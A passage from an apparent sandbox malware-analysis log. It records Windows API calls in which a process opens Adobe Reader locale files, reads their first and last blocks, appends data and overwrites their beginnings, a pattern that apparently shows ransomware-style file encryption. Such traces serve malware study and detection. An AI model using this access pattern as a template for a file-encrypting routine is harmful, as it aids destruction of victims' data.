10.0\\reader\\locale\\ja_jp\\updater.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.130] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.130] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2200 [0076.130] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.130] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.130] ReleaseMutex (hMutex=0x168) returned 1 [0076.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.JPN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.JPN", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.JPN", lpUsedDefaultChar=0x0) returned 11 [0076.131] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.534] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1200 [0076.534] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.539] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1200 [0076.546] WriteFile (in: hFile=0x1e8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.551] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.551] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.557] CloseHandle (hObject=0x1e8) returned 1 [0076.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\DigSig.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\digsig.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.857] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x15400 [0076.862] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.867] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.868] ReleaseMutex (hMutex=0x168) returned 1 [0076.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.KOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0076.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.KOR", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.KOR", lpUsedDefaultChar=0x0) returned 10 [0076.877] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.886] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x14400 [0076.886] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.887] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x14400 [0076.888] WriteFile (in: hFile=0x1fc, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.888] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.888] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.888] CloseHandle (hObject=0x1fc) returned 1 [0076.889] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\PPKLITE.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\ppklite.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.890] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.890] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x59600 [0076.890] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.891] ReleaseMutex (hMutex=0x168) returned 1 [0076.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.KOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.KOR", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.KOR", lpUsedDefaultChar=0x0) returned 11 [0076.891] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0076.896] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x58600 [0076.897] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.899] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x58600 [0076.900] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.900] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.900] WriteFile (in: hFile=0x1fc, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0076.901] CloseHandle (hObject=0x1fc) returned 1 [0076.901] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.902] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.902] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe4 [0076.902] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.902] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.902] ReleaseMutex (hMutex=0x168) returned 1 [0076.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0076.903] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ee71c8, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee71c8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe4, lpOverlapped=0x0) returned 1 [0076.904] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0076.904] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x66c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66c, lpOverlapped=0x0) returned 1 [0076.904] CloseHandle (hObject=0x1fc) returned 1 [0076.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\BRdlang32.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\brdlang32.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.906] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.906] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3200 [0076.906] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.907] ReleaseMutex (hMutex=0x168) returned 1 [0076.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.NOR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.NOR", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.NOR", lpUsedDefaultChar=0x0) returned 13 [0076.907] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.910] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2200 [0076.910] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.910] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2200 [0076.910] WriteFile (in: hFile=0x1fc, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.911] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.911] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.911] CloseHandle (hObject=0x1fc) returned 1 [0076.911] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Multimedia.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\multimedia.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.912] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.912] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13000 [0076.912] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.912] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.912] ReleaseMutex (hMutex=0x168) returned 1 [0076.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.NOR", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.NOR", cchWideChar=14, lpMultiByteStr=0x1f7362c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.NOR", lpUsedDefaultChar=0x0) returned 14 [0076.913] ReadFile (in: hFile=0x1fc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.916] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12000 [0076.916] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.916] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12000 [0076.916] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.917] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.917] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.917] CloseHandle (hObject=0x1fc) returned 1 [0076.918] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\SendMail.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\sendmail.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0076.919] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.919] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3a00 [0076.919] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.919] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.920] ReleaseMutex (hMutex=0x168) returned 1 [0076.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.NOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.NOR", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.NOR", lpUsedDefaultChar=0x0) returned 12 [0076.920] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.293] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2a00 [0077.294] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.300] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2a00 [0077.311] WriteFile (in: hFile=0x1fc, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.316] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0077.317] WriteFile (in: hFile=0x1fc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.317] CloseHandle (hObject=0x1fc) returned 1 [0077.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\AdobeCollabSync.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\adobecollabsync.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.318] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.318] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0077.318] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.318] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.318] ReleaseMutex (hMutex=0x168) returned 1 [0077.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.NLD", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0077.318] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.NLD", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.NLD", lpUsedDefaultChar=0x0) returned 19 [0077.318] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0077.320] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0077.320] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0077.320] CloseHandle (hObject=0x1fc) returned 1 [0077.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\IA32.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\ia32.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0077.324] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0077.324] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, 